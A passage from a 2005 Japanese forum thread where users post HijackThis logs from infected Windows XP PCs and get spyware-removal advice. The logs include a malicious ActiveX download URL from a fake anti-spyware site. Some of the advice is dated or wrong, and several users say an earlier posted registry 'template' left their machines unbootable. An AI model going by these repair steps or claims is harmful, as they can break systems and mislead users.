使用PC:DELL DEMENSION 8300
詳しいことは下記のサイトで…

ttp://www.geocities.jp/sutesaite/spyware.html

よろしくお願いします。

83 :52:05/02/14 23:17:42 ID:N3TqIg8y
>>81
わざわざスクショしてまでネタを投下するような俺じゃないと言うことを今証明!
Logfile of HijackThis v1.99.0
Scan saved at 23:12:47, on 2005/02/14
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
C:\Program Files\D-Tools\daemon.exe
C:\Program Files\Messenger Plus! 3\MsgPlus.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerJ.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\system32\wuauclt.exe
c:\progra~1\intern~1\iexplore.exe
C:\Documents and Settings\伊藤悠太\My Documents\031108Jane\狂っぷー\Jane2ch.exe
C:\Hangame\JAPANESE\majak2.exe
C:\Documents and Settings\伊藤悠太\My Documents\HijackThis.exe

84 :52:05/02/14 23:18:51 ID:N3TqIg8y
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\COMPAN~1\Installs\YCOMP5~1.DLL
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {BF093218-7E05-1630-BBD9-3EC0F8F05C84} - C:\DOCUME~1\伊藤悠太\APPLIC~1\ERRORG~1\Bolt itch.exe
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: &Yahoo!ツールバー - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\COMPAN~1\Installs\YCOMP5~1.DLL
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\Smtray.exe
O4 - HKLM\..\Run: [WinHandAutoClean] "C:\Program Files\WinHand\AUTOCLN.EXE"
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Program Files\D-Tools\daemon.exe" -lang 1033
O4 - HKLM\..\Run: [B'sCLiP] C:\PROGRA~1\B'SCLI~1\Win2K\BSCLIP.exe
O4 - HKLM\..\Run: [MessengerPlus3] "C:\Program Files\Messenger Plus! 3\MsgPlus.exe"
O4 - HKLM\..\Run: [iTunesHelper] C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [TurboAgent] C:\Program Files\TurboPlayer\TurboAgent.exe
O4 - HKLM\..\Run: [logo option fork iso] C:\Documents and Settings\All Users\Application Data\Inside Defy Logo Option\64 tons.exe

85 :52:05/02/14 23:19:33 ID:N3TqIg8y
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Yahoo!Japan Pager] C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerJ.exe
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Program Files\Messenger Plus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Sixthpoll] C:\DOCUME~1\伊藤悠太\APPLIC~1\DOESME~1\curb audio mpeg.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O9 - Extra button: Yahoo! メッセンジャ− - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerJ.exe
O9 - Extra 'Tools' menuitem: Yahoo! メッセンジャ− - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerJ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {205FF73B-CA67-11D5-99DD-444553540000} (CInstall Class) - http://www.spywarestormer.com/files2/Install.cab
O16 - DPF: {2C079F28-EE92-4700-A44B-AF5FA285FCCA} (HanGamePluginJP16 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HanGamePluginJP16.cab
O16 - DPF: {4A88CB42-BBFE-496A-884F-98E8AC316292} (YJInstStarter Control) - http://dl.toolbar.yahoo.co.jp/dl/installs/yjinst.cab

86 :52:05/02/14 23:20:10 ID:N3TqIg8y
O16 - DPF: {4DED8BE6-C27E-40D2-9BD0-24BE513B4E6F} (TurboIS Control) - http://vodimages.hangame.co.jp/tms/turbois.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by101fd.bay101.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {B469C508-9A75-4A62-BFA9-62802D653A4B} (HanGamePluginJP15 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HanGamePluginJP15.cab
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe

87 :ひよこ名無しさん:05/02/14 23:27:25 ID:???
先生!!( ・ω・)∩
伊藤○太君はWindows Updateをしてないみたいですっ!!!

88 :52:05/02/14 23:29:47 ID:N3TqIg8y
マジか!

89 :52:05/02/15 00:01:09 ID:Rnq/2Ji3
一応、アップデートはしてみたけど、やっぱ効果は無いね。

90 :ひよこ名無しさん:05/02/15 00:03:53 ID:???
おい!
イ尹藤悠太!!
ちょっと出てこい!!!

91 :52:05/02/15 00:07:48 ID:Rnq/2Ji3
おし!出てきた。
まぁ、一応すべてをさらけ出したつもりだ!
これ以上聞いてレスが帰ってくる可能性なんてない!
レスは読むが書き込みはもうしないぜ!本当さ。

92 :ひよこ名無しさん:05/02/15 00:10:43 ID:???
あ、そ。

93 :ひよこ名無しさん:05/02/15 00:13:41 ID:???
O16 - DPF: {205FF73B-CA67-11D5-99DD-444553540000} (CInstall Class) - http://www.spywarestormer.com/files2/Install.cab

偽スパイウェア駆除サイトだな。なにか仕組まれたなきっと。HijackThisに現れない症状は
あきらめた方がよい。自業自得。

94 :ひよこ名無しさん:05/02/15 00:17:15 ID:???
O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Program Files\D-Tools\daemon.exe" -lang 1033

 な に  や っ て ん の ?

95 :52:05/02/15 00:22:58 ID:Rnq/2Ji3
思わずここで書き込みたくなっちゃう。いなくなるって言った後にレス貰っちゃうと嬉しく悲しい。
>>93
ありがとう!とりあえずfixした。
ちなみに俺の症状は結構前からのものだ。それに感染したのは恐らく今日だから多分関係ない。
>>94
ああ、それもきっとスパイウェアだ。勝手に入ってたんだ。

96 :たぬたんなりよ(=^u^=):05/02/15 00:33:49 ID:???
>>95
(=^u^=) たぬたんが見たところログからは解からないなりね

これが不明なり、心当たりはあるなりか?
O4 - HKLM\..\Run: [logo option fork iso] C:\Documents and Settings\All Users\Application Data\Inside Defy Logo Option\64 tons.exe

ハンゲ ちょっと参考に・・・
O4 - HKLM\..\Run: [TurboAgent] C:\Program Files\TurboPlayer\TurboAgent.exe
http://plus.naver.co.jp/browse/db_detail.php?dir_id=10405&docid=13370&l_url=L2xpc3QvZGlyX2xpc3RfZGIucGhwP2Rpcl9pZD0xMDQwNQ==

>>94
(=^u^=) それはIBMなら問題ないと思うなり・・・

97 :52:05/02/15 00:38:05 ID:Rnq/2Ji3
>>96
むむ!心覚えがない!
早速fixしてみますぜ。
Turbo Playerはハンゲでポンみたくて手に入れたけど、あれはひどかった。
それも一応fixします!

98 :52:05/02/15 00:41:36 ID:Rnq/2Ji3
おや!もしかして消えた!?
これはありがたいです。実際に消えているかどうかはわかりませんので、明日もう一度報告したいと思います。

99 :ひよこ名無しさん:05/02/15 05:15:44 ID:???
....       ,-――――――-、
..       /  __[|__  ヽ
   ,-´ ̄ ̄ ̄ ̄____ ̄ ̄ ̄ ̄`―、
.   /,-――――i_|..[□ □]...|.i――――-、ヽ
  |_|.[リュンリュン ]|..|i-------i|.|[ 特.......急 ]|_|
  | |――――-|.||i―――i||.|.-────| |
  | |      /| |||    .|||.|         | |    ___________
  | |   /   | |||     |||.|   ∩∩  | |   /
  | | /    | |||     |||.|   | |_| |  | | <  リュンパッチ♪発進だよ!
  | |   /  | |||     |||.| ( ・∀・ ) | |   \___________
  | | /    .| |||     |||.|¶⊂¶⊂ ) .| |
  | `ー-.--、_|..|||_____|||.|_,----―'´...|
  |        ..||. ̄ ̄ ̄.||.        .|
  |   [二l二]  ||. リュン♪.||  [二l二]   |
 ..ヽ     _  ||____||   _   ../
  .ヽ_____|ニ二二ニ|_______/
   ..|| / ̄ ̄|.|!|_{|=゚ロ|}_|!|.| ̄ ̄ヽ. ||
 .. ヽ ̄   .|________|   ... ̄/
   ヽ___ヽ_______/____/

100 :ひよこ名無しさん:05/02/15 06:27:08 ID:???

       ローリング!!    ∧∧
               (゚Д゚,,)
               ⊂⊂,,ヽ
                (_ (  )ノ

     クルン
              /⌒⌒ヽノ  )))
              (   )て )
          (((   ∨∨⊂ノ

ズサギコ!!
                    (´´
   ∧∧  )  ≡≡≡≡≡(´⌒(´≡≡
 ⊂(゚Д゚⊂⌒つ ≡≡≡≡(´⌒;;≡
           (´⌒(´⌒;;
100ゲット!!ズサササササーーーーーーーーー!!!

101 :ひよこ名無しさん:05/02/15 06:37:30 ID:???
>>12-19
↑今からやります。

102 :ひよこ名無しさん:05/02/15 06:49:40 ID:???
>>101
ここに決意を書き込んでから実行してくれ
http://pc5.2ch.net/test/read.cgi/win/1106975895/

103 :52:05/02/15 07:38:57 ID:Rnq/2Ji3
消えてませんでした・・

104 :ひよこ名無しさん:05/02/15 07:53:28 ID:???
>>103
fixしたエントリが復活してないか、もう一度みてみ

105 :ひよこ名無しさん:05/02/15 10:39:31 ID:4bQWHGsl
GOLDEN RETRIEVER CACH BACK
というソフトがいつの間にインストールされていて
コントロールパネルからアプリケーション削除してもできません。
このソフト何ですか?
検索しても英語でわかりませんです。


106 :ひよこ名無しさん:05/02/15 10:41:34 ID:???
>>105
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

107 :52:05/02/15 14:05:58 ID:Rnq/2Ji3
>>104
一応復活は見られませんでした。

O23にあるiPodServiceがスパイウエアだと知りました。
fixしてみます。

108 :ひよこ名無しさん:05/02/15 14:42:12 ID:???
>>107
iPodを持っていれば必要になるサービス。確かに無条件に組み込むやりかたには疑問だが
スパイウェアではない。不必要ならば単にサービスを停止すれば良い。

109 :ひよこ名無しさん:05/02/15 15:04:33 ID:5wGCqNms
Ad-aware6.0を入れてればSpybotっていらないんですか?
Spybotで引っかからないものがAd-awareでは引っかかったりするけど、
その逆はありますか?

110 :ひよこ名無しさん:05/02/15 15:06:43 ID:???
>>109
両方必要

111 :52:05/02/15 15:07:31 ID:Rnq/2Ji3
>>108
レスありがとうございます。
スパイウエアではないんですね、一応消しました。

112 :ひよこ名無しさん:05/02/15 15:14:10 ID:5wGCqNms
>>110
そうなんですか。
ありがとうございました。

113 :たぬたんなりよ(=^u^=):05/02/15 20:01:34 ID:???
>>111
(=^u^=) とりあえず>>93さん指摘の↓以外のエントリは元に戻してみるなり。
O16 - DPF: {205FF73B-CA67-11D5-99DD-444553540000} (CInstall Class) - http://www.spywarestormer.com/files2/Install.cab

「Config」→「Backups」を選ぶと、これまで処理したファイルの一覧が出ます。
これらは削除したエントリーごとに作られるので、個別のエントリーを復帰/削除できます
復活したいファイルを指定して「Restore」をクリックすると確認メッセージが出ます
「はい」をクリックすればリストアされます

114 :たぬたんなりよ(=^u^=):05/02/15 20:02:55 ID:???
>>111
(=^u^=) どうもMessenger Plus関連のアドウェアが入ってるみたいなりね。
     コントロールパネルから↓を参考にMessenger Plus! 3を削除するなり。
     http://www.higaitaisaku.com/msnplus.html

(=^u^=) 次にHijackThis以外のウィンドウをすべて閉じ、
    下記エントリにチェックを入れてFix後、PCを再起動するなり。
     (QuickTime関連の不要エントリも含むなり)

O2 - BHO: (no name) - {BF093218-7E05-1630-BBD9-3EC0F8F05C84} - C:\DOCUME~1\伊藤悠太\APPLIC~1\ERRORG~1\Bolt itch.exe
O4 - HKLM\..\Run: [MessengerPlus3] "C:\Program Files\Messenger Plus! 3\MsgPlus.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [logo option fork iso] C:\Documents and Settings\All Users\Application Data\Inside Defy Logo Option\64 tons.exe
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Program Files\Messenger Plus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [Sixthpoll] C:\DOCUME~1\伊藤悠太\APPLIC~1\DOESME~1\curb audio mpeg.exe

IEを起動せずコントロールパネル→インターネットオプションからテンプレ>>2の1)2)

その後Fixエントリ関連フォルダ&ファイルの削除をするなり。

C:\DOCUME~1\伊藤悠太\APPLIC~1\ERRORG~1\Bolt itch.exe
C:\Program Files\Messenger Plus! 3\MsgPlus.exe
C:\Documents and Settings\All Users\Application Data\Inside Defy Logo Option\64 tons.exe
C:\Program Files\Messenger Plus! 3\MsgPlus.exe" /WinStart
C:\DOCUME~1\伊藤悠太\APPLIC~1\DOESME~1\curb audio mpeg.exe

セーフモードでspybot、Ad-aware SE、CWShredderを実行するなり。

念の為にANTIDOTEを↓からDLしてセーフモードでウィルススキャンしてみるなり。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/eula.html

115 :ひよこ名無しさん:05/02/15 20:59:30 ID:???
>>113
そこはie-spyadにも登録されているインチキサイトなんだが、戻すのには理由があるのかな?

116 :たぬたんなりよ(=^u^=):05/02/15 21:59:16 ID:???
>>115
(=^u^=) 表現が悪かったなりね、そのエントリだけは戻さずに
      他にFixしたものを戻すとゆう意味なり。

>(=^u^=) とりあえず>>93さん指摘の↓以外のエントリは元に戻してみるなり
                        ゜゜゜゜゜

117 :ひよこ名無しさん:05/02/15 22:06:24 ID:???
いい事教えてやろうか?どのサイトも怖くなくなる方法。
IE→プロパティ→セキュリティタブ→インターネット→レベルのカスタマイズ

無効にする項目
     ||
ActiveXのところ全て
Java の許可
スクリプトのところ全て
ページの自動読み込み
ファイルのダウンロード
あと、
ソフトウェア チャンネルアクセスの許可=安全性-高
他は規定通りの設定でOK。

本当の所は全ての項目を「無効にする」が望ましい。
さらに重要な事、セキュリティソフト=アンチウイルス、ファイアーウォール
アンチスパイウェアをPCにインストール(無論最新の状態)
WindowsUpdateも行なう。
これで、99.99%ウィルス、スパイウェアの進入を防ぐことができる。
試しに>71のサイト(面白そうだから見てやれ)と思い踏みました。
ページが表示されるのですが、文字も画像も無い真っ白なページが表示
されて、セキュリティソフトがウィルス、スパイウェアの侵入を防いでくれました。
首を傾げた。

118 :52:05/02/15 23:44:50 ID:cHTzXk+m
>>114
とりあえず、Messenger Plus! 3のアンインストールをしました。

119 :ひよこ名無しさん:05/02/15 23:50:54 ID:???
>>116
あゴメン。勘違いだあ。

120 :たぬたんなりよ(=^u^=):05/02/15 23:57:10 ID:???
>>118
(=^u^=) >>114の作業は全部実行したなりか?

。HijackThisのエントリは綺麗に消えたなりか     
。ウィルススキャンの結果はどうだったなり
。まだ症状はあるなりか

>>119
(=^u^=) よかった安心したなり♪

121 :ぼるじょあ ◆yBEncckFOU :05/02/15 23:59:05 ID:???
>>117
(・3・) エェー これも簡単で効果もほとんど同じですYO

【ステータスバーをWクリックで、ふが!友の会】
http://d.hatena.ne.jp/palm84/20041229/p1

アンチスパイソフトバカスカ入れて悦に入ってるヤシがおBAKAに見えますNE

122 :52:05/02/15 23:59:11 ID:cHTzXk+m
>>120
いまのところは症状は見られなくなりました。
今日はもう時間がないので明日やろうと考えています。
やったほうがいいですよね?

123 :たぬたんなりよ(=^u^=):05/02/16 00:04:45 ID:???
>>122
(=^u^=) 症状は消えたなりか、それはよかったなり♪

     多分また復活すると思うので徹底的に駆除しておくなり。

124 :ひよこ名無しさん:05/02/16 00:23:37 ID:???
すいません
>>16
を実行したら
再起動後 システムの仮想メモリが少なすぎます
と出て パソコンがおかしくなってしまいました・・・
パニックです
助けてください セキュリティソフトもオフになっているので
あんまりネットに繋ぎたくないんですが 自分では解決できそうにないので・・・


125 :ひよこ名無しさん:05/02/16 00:25:27 ID:???
>>124
>>21

126 :ひよこ名無しさん:05/02/16 00:28:19 ID:???
>>125
orz
もうだめぽ・・・

127 :ひよこ名無しさん:05/02/16 00:30:33 ID:???
>>11
>>11
>>11

128 :ひよこ名無しさん:05/02/16 00:31:33 ID:???
どうしよう・・・


129 :ひよこ名無しさん:05/02/16 00:32:04 ID:???
>>128
ガンガレ

130 :ひよこ名無しさん:05/02/16 00:32:31 ID:???
>>129
なんとかがんばってみる

131 :ひよこ名無しさん:05/02/16 00:34:06 ID:???
>>130
やったのは>>16だけなの?

132 :ひよこ名無しさん:05/02/16 00:34:24 ID:???
>>131
はい >>16だけです

133 :ひよこ名無しさん:05/02/16 00:35:29 ID:???
   ∩___∩         | 
   | ノ\     ヽ        | 
  /  ●゛  ● |        | 
  | ∪  ( _●_) ミ       j 
 彡、   |∪|   |        J 
/     ∩ノ ⊃  ヽ 
(  \ / _ノ |  | 
.\ “  /__|  | 
  \ /___ / 



134 :ひよこ名無しさん:05/02/16 00:36:20 ID:???
>>133
いや マジで釣りじゃないんですよ・・・

135 :ひよこ名無しさん:05/02/16 00:37:40 ID:???
絶対にネタ。ウザイから消えろ!

136 :ひよこ名無しさん:05/02/16 00:38:09 ID:???
>>135
だからネタじゃないって

137 :ひよこ名無しさん:05/02/16 00:38:54 ID:???
上書きインストールでなんとかならないかな?

138 :ひよこ名無しさん:05/02/16 00:40:02 ID:???
このスレの中から>>16だけピックアップして実行するって普通にないだろ

139 :ひよこ名無しさん:05/02/16 00:45:01 ID:???
>>16が一番おいしいことが書かれてるなw

140 :ひよこ名無しさん:05/02/16 00:46:57 ID:???
自演して存在アピールか。ゲロきもい。ビョウキだろwWwwilsdkjfiolっっs

141 :ひよこ名無しさん:05/02/16 00:49:41 ID:???
再起動したけどダメだった・・・
もうだめかもしれんね

142 :ひよこ名無しさん:05/02/16 00:50:47 ID:???
ハイハイ

143 :ひよこ名無しさん:05/02/16 00:50:55 ID:???
上書きインストールに全てを賭けろ

144 :ひよこ名無しさん:05/02/16 00:52:25 ID:???
>>143
やりかた教えて下さいな

145 :ひよこ名無しさん:05/02/16 00:55:32 ID:???
朝までにおもしろいオチ待ってるぞ

146 :ひよこ名無しさん:05/02/16 00:56:36 ID:???
>>145
だから釣りじゃないと何度言えばわかるんだ

147 :ひよこ名無しさん:05/02/16 00:58:31 ID:???
まず>>1ぐらい読もうね

148 :ひよこ名無しさん:05/02/16 00:59:43 ID:771FXGDm
あぁ すいません


149 :ひよこ名無しさん:05/02/16 01:00:05 ID:???
ツマンネ。ニュー速でも逝ってくらぁ

150 :ひよこ名無しさん:05/02/16 01:01:29 ID:771FXGDm
>>149
いってらっしゃい
さて どうしよう・・・
マジでわからない

151 :ひよこ名無しさん:05/02/16 01:17:47 ID:???
>>150
MEだろ?
http://fumika.jp/nikki/2004/01/me_install

152 :ひよこ名無しさん:05/02/16 03:04:29 ID:dI6IOiOC
PCの調子がおかしくて困ってます・・・orz=3

・OS ウィンドウズXP(SP2導入済)

・症状 
 起動時に毎回「gksgrfzh.exeで問題が発生しました」とメッセージが出る。
 IEを使用中、頻繁に応答なしの状態になる(その度にタスクマネージャから終了させてます)
 ウィンドウズ終了時に、毎回iexplprer.exeが応答なしの状態とメッセージが出る。

・セキュリティ関係
 ずっとウィルス対策ソフトなしの状態でPCを使用してました(大いに反省してます)
 問題が発生するようになってからウイルスバスター2005を導入しました。
 そこで検索した結果、TROJ_AGENT.IVに感染していたことが判明し、即座に感染ファイルを削除しました。
 また、同様にウイルスバスターでスパイウェアを検索し、見つかったスパイウェアを全て削除しました。

あまりに無対策だった自分が悔やまれます・・・。
自業自得といえばそれまでですが、なんとかアドバイスを頂きたいと思い、カキコしました。
先輩方、よろしくお願いします。

153 :ひよこ名無しさん:05/02/16 03:10:00 ID:???
>>152
1.OSCDから修復をかけてみる

2.たぶん直りきらない

3.リカバリする

の順でためしてください

154 :152:05/02/16 03:29:10 ID:dI6IOiOC
>>153
レスありがとうございます。
今日はもう遅いので、明日にでも実行してみようと思います。

他にもアドバイス等あったらよろしくお願いします。

155 :ひよこ名無しさん:05/02/16 04:39:07 ID:???
>>154
一度濁った水槽は元には戻らない。そう覚えておけ。
簡単だ。水を全部捨てて砂利を入れ替えてホースできれいな水を注ぐ。
それが終わったら金魚を入れてもいいぞ。
前飼っていた金魚は死んでしまったから庭に埋めて手を合わせるんだ。

156 :ひよこ名無しさん:05/02/16 04:46:11 ID:???
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

157 :ひよこ名無しさん:05/02/16 05:35:27 ID:???
>>155
濾過器・ヒーターがアンチウイルスソフトやデフラグ、時々水を替えるのがバックアップだね。
かなりうまい喩え。

158 :ひよこ名無しさん:05/02/16 09:26:20 ID:???
他のスレで質問して誘導されてきたのですが
http;67;15;70;15/black/fuckporn.html
なんていうサイトが勝手に立ち上がってくるようになってきたんですが
どなたか解決方法は分かりませんでしょうか。
アダルトサイト等には回っていないのですが、何故か。
システムに復元をしてネットに繋ぐ以前の状態にしたりしたのですが
治りませんです。
osはxpです。どなたか助言を。


159 :ひよこ名無しさん:05/02/16 11:05:27 ID:???
モーターがウィーンって鳴る様になった
関係あるのかな?

160 :ひよこ名無しさん:05/02/16 12:32:48 ID:FwwAF8l/
>>158
アドウェアかスパイボットを使えば幸せになれるよ。

161 :ひよこ名無しさん:05/02/16 12:39:43 ID:???
アドウェアを使うの?

162 :ひよこ名無しさん:05/02/16 12:43:09 ID:FwwAF8l/
>>161
スパイウェアが原因っぽいから、アドウェアとかのアンチスパイボットを使って
スパイウェアを削除すればいい。
ホームページが書き換えられてるなら、ツール→インターネットオプション→ホームページを
任意のURLにすればいい。

163 :161:05/02/16 12:43:55 ID:FwwAF8l/
>アドウェアとかのアンチスパイボットを使って
アンチスパイウェアの間違いです。

164 :ひよこ名無しさん:05/02/16 14:23:16 ID:???
、(///▽///)

165 :ひよこ名無しさん:05/02/16 19:22:26 ID:???
おいおい>124
>16実行する前にちゃんと>12-13読んだか?
大事な事が書かれていたの気付かなかったのか?

>12
>この説明文を最後まで良く読んでから実行して下さい。
>THE・禁断のテンプレ(ファイナル.Ver)を実行する前に、
>必ず次の「THE・禁断のテンプレ(ファイナル.Ver)とは?」を良く読み、
>内容をご理解できたならTHE・禁断のテンプレ(ファイナル.Ver)を実行して下さい。
>(注*THE・禁断のテンプレ(ファイナル.Ver)はレジストリエディタを操作します。
>レジストリエディタの操作を誤ると深刻な問題が発生する事があります。
>最悪の場合、オペレーティングシステムの再インストールが必要になります。
>レジストリエディタの操作はくれぐれも慎重に行なって下さい。)
ここまでだと、レジストリを操作することが書かれているので、>16の場合は
レジストリを操作しないので、>16とレジストリは関係の無い事だったと思い、
実行した。
じゃあ、

>13
>(本当に(不起動になるので)ウィルス・スパイウェアの活動が停止します)←【重要】
ちゃんと不起動=起動しなくなると書かれているではないだろうか。

結論:>12-13の文を読まずに>16を実行したお前が悪い。

166 :ひよこ名無しさん:05/02/16 19:30:10 ID:???
工エエェェ(´д`)ェェエエ工

167 :ひよこ名無しさん:05/02/16 20:22:48 ID:???
すいません。
>>14を実行しても症状が治らなかったので
>>18を実行して再起動しても起動できなくなりました。
えーん(T_T)えーん

168 :ひよこ名無しさん:05/02/16 20:35:43 ID:???
>>167
最終解決手段=PCを窓から投げ捨てる

169 :ひよこ名無しさん:05/02/16 22:23:38 ID:???
ちょっと違うかもしれないけど
エロイサイトでポップアップ広告でじゃなくて新しくIEが開くタイプのがありますがそういうのも表示出来ないようにすることは可能ですか?

170 :ひよこ名無しさん:05/02/16 22:31:53 ID:???
SpybotでCoolWebSearchを
除去しても再起動して再びスキャンすると検出されます。
何回やっても同じです。
CWShredderはエラーが出るのでできません。
根本的に解決するにはどうすれば良いのでしょう?

171 :ひよこ名無しさん:05/02/16 22:38:33 ID:???
http://www.higaitaisaku.com/removecws.html の
実行時にエラーが出る場合
CoolWebShredderを立ち上げるとすぐに終了してしまう場合
は試したんかい

172 :170:05/02/16 22:42:03 ID:???
>>171
最新版にUPDATEしたらエラーが出なくなりました。
すみません。

173 :170:05/02/16 22:42:30 ID:???
今から禁断のテンプレやってみます。

174 :158:05/02/16 23:16:36 ID:???
アドウェアとスパイボットを組み合わせてセーフモードでもチェックして
無事スパイウェアは全部削除できました。
・・・と思ったのですが、今なお糞野郎(67;15・・・略)のブラウザは
立ち上がってきます。もうどうしようもないので再インストする事にしますです。
みなさんもfuckpornもといCnsMinには気をつけて下さい。


175 :たぬたんなりよ(=^u^=):05/02/16 23:26:27 ID:???
>>174
(=^u^=)つCnsMinの除去方法
     http://www.higaitaisaku.com/removecnsmin.html

176 :158:05/02/16 23:42:37 ID:???
>>175
どうもです。実はそのサイトで駆除方法を調べていたので
CnsMinの除去は出来たのですが今だにfuckpornは立ち上がってくるので
CnsMinが原因ではないみたいなのです。
なので、原因がわからないのでどうしようもなくなりました。


177 :たぬたんなりよ(=^u^=):05/02/16 23:47:13 ID:???
>>176
(=^u^=) HijackThisのログを貼り付けてくれれば、何かわかるかもしれないなり。

178 :158:05/02/17 00:00:09 ID:???
R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
O2 - BHO: BHObj Class - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem220.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O3 - Toolbar: &Liquid Surf - {B9F633F6-EA44-45F4-91EB-FABFC65A0634} - C:\Program Files\LiquidSurf\sybil.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [ATIModeChange] Ati2mdxx.exe
